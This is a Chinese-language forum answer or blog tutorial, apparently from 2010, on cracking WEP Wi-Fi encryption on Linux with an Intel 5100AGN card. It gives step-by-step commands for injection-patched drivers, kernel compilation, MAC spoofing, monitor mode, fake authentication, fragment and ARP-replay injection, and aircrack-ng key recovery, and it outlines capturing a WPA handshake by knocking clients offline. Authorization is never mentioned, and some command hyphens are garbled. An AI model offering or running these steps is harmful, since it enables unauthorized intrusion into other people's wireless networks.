Linux下使用Intel_WiFi_Link_5100AGN 破解無線加密

Linux下使用Intel_WiFi_Link_5100AGN 破解無線加密

就是傳說中的BT4破解

ㄝㄙㄩㄧㄝ 回答:1 人氣:16 解決時間:2010-02-24 14:55

滿意答案

該網站爲5100AGN 提供了支持注入的驅動升級,提供了C 源代碼 diff 文件。
2. http://tinyshell.be/aircrackng/forum/index.php?topic=4217.0
該網站驗證了5100AGN 能工作於注入模式,並提供升級網卡驅動的思路。
3. http://www.wlanbbs.com
中國無線論壇網,着重參考了中衛寫的《BT3 破解無線WEP/WPA 教程》。
測試環境說明
1.
測試目的: 破解WEP 密碼
2.
測試系統: Ubuntu Linux 8.10
3.
測試網卡:
Intel WiFi Link 5100AGN
4.
破解軟件:
aircrack
5.
網卡驅動: Stefanik Gábor 2008 9 23 日寫的驅動

XP
下的準備工作
Linux
下當然都能完成這些準備工作,不過是菜鳥麼,怎麼熟悉怎麼來。
1.
安裝 Ubuntu 8.10,新手建議在Windows 下使用wubi 直接安裝,非常非常的方便!
2. http://kernel.org/pub/linux/kernel/v2.6/
選擇 linux2.6.27.7.tar.gz 下載。當然日後更新的
內核版本應該也能使用,目前能確認的是2.6.27rc72.6.27rc8 的內核版本都能使用。
3. http://git.kernel.org/?p=linux/kernel/git/linville/wireless
testing.git;a=commit;h=84e8e77f61
8f589316e83dfa1bfafe5a47bf0bd2
下載3 個支持注入的5100AGN 的驅動源文件,名字爲

iwl
agn.c iwlsta.c 以及 iwltx.c
4.
爲圖方便,可以在XP 下查看好要破解WEP SSIDMAC 地址、工作信道等信息,並用
txt
文件保存好。
Ubuntu
下的準備工作
1.
裝好的 Ubuntu 網卡驅動是直接支持5100AGN 的,只是不能工作在注入模式。首先還是
需要一個可用的網絡來下載點東西。
2.
進入 root 權限。Ubuntu 默認情況不允許用root 帳戶登陸,獲得root 權限的方法很多,
講個對日後操作最方便的方法。
首先,打開終端,輸入指令sudo passwd root,設置新的root 帳戶密碼。
然後在左上角點擊System>Preferences>Login Window 菜單,選擇Security 選項,
接着選中其中的“Allow Local system administrator login”選項,確認設置。
最後Ctrl+Alt+退格,輸入root 及密碼重新登陸即可。
這樣就永久獲得了root 權限,可以在Ubuntu 中隨意的用鼠標拷貝粘貼文件了。
3. sudo apt
get install aircrack,安裝破解軟件aircrack
4.
下載一些配置要用的軟件(如果並不想自己配置內核,可跳過)

sudo apt
get install buildessential bin86 kernelpackage
sudo apt
get install libqt3headers libqt3mt
dev
5.
稍等片刻,全部下載安裝完成後,開始更新網卡驅動,編譯 Linux 內核。

打開並解壓縮下載的linux2.6.27.7 的內核,把解壓後的文件整個拷貝到 /usr/src 的目錄
下。在這個目錄下,還會有幾個別的版本的內核文件在呢。
打開這個新內核 /drivers/net/wireless/iwlwifi/,用下載的支持注入的iwlagn.c iwlsta.c
以及iwltx.c 三個文件覆蓋掉原來的文件。

6. sudo mv linux linux.bak
,確保沒有叫linux 的這個鏈接(好像和快捷方式的概念差不多)
sudo ln
s ./linux2.6.27.7 linux,把下載的新內核鏈接到
linux
cd linux
,進入linux 這個目錄

7.
配置內核。配置內核是件困難的事情!參數繁多,一不小心就會導致升級失敗。所以基
本思路是把當前內核配置文件拷貝過來一用。
sudo cp /boot/config
`uname r` .config,複製當前的內核配置。
sudo make xconfig
,當然如果想自己再看看配置,微調一下也可以。然後會彈出一個配
置內核的窗口,對配置內核感興趣的google,我基本沒改。
8.
弄了份現成的配置文件,下一步就是編譯了。爲以後升級方便,先打包成 deb 包。
cd /usr/src/linux
sudo
s –H
make
kpkg clean
sudo make
kpkg ‐‐
initrd –revision=diy1 kernel_image kernel_headers
最後行輸入完畢後,編譯需要一個多小時,在確認開始編譯後,該幹嗎幹嗎去!

9.
安裝新的內核。在你的耐心差不多消磨至盡的時候,破解的準備工作也到了最後一步了。
sudo dpkg
i /usr/src/kernelimage2.6.27.7*.deb,安裝內核包
sudo dpkg
i /usr/src/kernelheaders2.6.27.7*.deb,安裝內核headers
也非常有必要到/usr/src 中把這兩個deb 文件給拷貝出來,下次重裝Linux 升級可就不用
這麼麻煩了。
sudo dpkg -i <name of the file&gt
,設置grub 默認引導
現在重啓一下,如果順利,會自動進入2.6.27.7 的新內核。
破解WEP 密碼
1.
做了這麼多準備工作,終於可以開始動手做想做的事情了。建議大家先別急着輸指令,
可以新建個文本文件,把要輸入的指令,要破解的SSID 號,MAC 地址,信道等等全部
安安心心的用拷貝、粘貼大法全部清晰的輸入好。
2.
新建一個終端
sudo –s
可省,輸入密碼後,進入root 權限。
lsmod
可省,查看驅動列表。反饋信息如下,可以在裏面找到5100AGN 的驅動。
Module Size Used by
nls_iso8859_1 12288 1
nls_cp437 13952 1
vfat 18816 1
fat 57504 1 vfat
............
modinfo iwlagn
可省,查看網卡驅動的詳情。反饋信息如下。
filename: /lib/modules/2.6.27.7/kernel/drivers/net/wireless/iwlwifi/iwlagn.ko
alias: iwl4965
license: GPL
author: Copyright(c) 2003
2008 Intel Corporation
version: 1.3.27ks
description: Intel(R) Wireless WiFi Link AGN driver for Linux
firmware: iwlwifi
4965
2.ucode
srcversion: xxxxxxxxxxxxxxxxxxxxxxx
ifconfig –a
可省,查看本機網卡詳情。反饋信息如下

eth0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xx
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:219 Base address:0x8000
Lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:246 errors:0 dropped:0 overruns:0 frame:0
TX packets:246 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:15408 (15.4 KB) TX bytes:15408 (15.4 KB)
pan0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xx
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
wlan0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xx
UP BROADCAST MULTICAST MTU:1492 Metric:1
RX packets:19 errors:0 dropped:0 overruns:0 frame:0
TX packets:20 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:5188 (5.1 KB) TX bytes:3895 (3.8 KB)
wmaster0 Link encap:UNSPEC HWaddr xx
xxxxxx……
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
特別關注下深綠色標註的地方,wlan0 爲網卡代號,xx:xx:xx:xx:xx:xx 爲本機MAC

airmon
ng
可省,查看本機的網卡。反饋信息如下

Interface Chipset Driver
wlan0 iwlagn
[phy0]
macchanger –m 00:11:22:33:44:55 wlan0
可省,修改自己網卡的MAC 地址。當對方設置了MAC 地址過濾時纔有必要用吧,要用

的話需要下載一下的。
airmon
ng start wlan0 6
必須的!讓網卡在信道6 處監聽信息。數字6 就是要破解AP 的工作信道(channel)。

Interface Chipset Driver
wlan0 iwlagn
[phy0]
(monitor mode enabled on mon0)
會返回一個mon0 處於監聽模式的提示,輸入第二次的話會變成mon1,類推。

aireplay
ng 9 mon0
可選,測試注入攻擊。如果測試通過,破解WEP 就易如反掌了。反饋信息如下

21:00:55 Trying broadcast probe requests...
21:00:55 Injection is working!
21:00:56 Found 3 APs
……
如果第二行返回值是No Answer,可能原因有很多,其中包括網卡驅動的問題。
如果第二行返回值是Injection is working,就說明網卡已經工作在注入攻擊模式下。
然後軟件會去ping 每個找到的AP,這裏可以得到信道上所有AP SSIDMAC、信道、
信號強度等等。
airodump
ng –ivs –w name –c 6 mon0
必須的!抓ivs 包,name 爲儲存文件的名字,6 爲信道,然後會有個一直在抓包的界面

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ES
xx:xx:xx:xx:xx:xx 179 3 159 0 0 6 54. WEP WEP T
特別關注 #Data 這欄,它的值就是抓到的ivs 的數量,目前漲的很慢,當我們在第二個
終端中敲幾個指令後,就會發現它漲的飛快,過了1 萬,就可以用第三個終端來破解密
碼了!
3.
新建第二個終端,不要關掉第一個終端!
aireplay
ng 1 0 e TPLINK a 000000000000 h 111111111111 mon0
必須的!進行僞裝鏈接,TPLINK 爲要破解AP SSID000000000000 爲要破解AP

MAC
地址,111111111111 爲本機網卡的MAC 地址,如果用macchanger 僞裝過,就輸
入僞裝後的MAC 地址。
aireplay
ng 5 b 000000000000 h 111111111111 mon0
必須的!獲得至關重要的xor 文件,參數說明同上個指令。需要一點點抓有效包的時間。

成功以後輸入y,會得到一個fragmentXXXXXXXXXXX.xor 的文件,XXXXX 是數字。
packetforge
ng 0 a 000000000000 h 111111111111 k 255.255.255.255 l 255.255.255.255
y fragmentXXXXXXXXXXX.xor
w mrarp
必須的!參數說明同上個指令。fragmentXXXXXXXXXXX.xor 就是上個指令中獲得的文件。

aireplay
ng 2 r mrarp x 1024 mon0
必須的!注入攻擊。

此時第一個終端內的#Data 欄的值應該在飛速增長。
4.
新建第三個終端,前兩個終端都不要關閉。
#Data 欄的數據達到10000 以上時,就可以破解了。
aircrack
ng n 64 b 000000000000 name01.ivs
必須的!破解WEP 密碼,000000000000 是要破解AP MAC 地址。

一般地,幾秒內密碼就出來了。如果對方的密碼設置的比較牛,多抓些ivs 包後再破解
即可。保存好WEP 密碼,退出三個終端。
破解WPA 密碼
要破解WPA 密碼,必須要抓到握手協議包。這個不難,基本思路是在有客戶端的情況
下攻擊該客戶端使其斷線,然後監聽其重新聯網時的握手協議包。可參考中國無線論壇網
中衛寫的《BT3 破解無線WEP/WPA 教程》。
WPA 只能暴力破解,如果沒有任何關於密碼的信息。光數字加小寫字母的8 位密碼
字典就能有幾G 大小,要窮舉這些密碼,現在的電腦速度還遠遠不夠。所以在沒有任何關
於密碼信息的情況下,要破解WPA 只能是浮雲……這裏也就沒必要多介紹了。
破解WEP 密碼總結
本人研究WEP 密碼破解就此告一段落。從一個完全對破解和Linux 一竅不通的人,通過
論壇,google,到目前基本弄清了無線網加密技術及破解方法的基本思路和一些皮毛,還是
小有成就的。而意外接觸Ubuntu 更是讓我對Linux 興趣大增,沒想到Linux 已經變得如此方
便!以前望而卻步的內核編譯也算比較順利的完成了,當然沒玩什麼配置,不過有了第一次
成功的體驗,以後也就敢於慢慢深入了。
這次用5100AGN 破解WEP 密碼最大的收穫就是:如果想做一件事情,就多做少說,潛
心研究!尤其作爲菜鳥,要少發問,多實踐,有信心和耐心來攻破難題,定能成功!
全文完

發佈了8 篇原創文章 · 獲贊 0 · 訪問量 5萬+
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章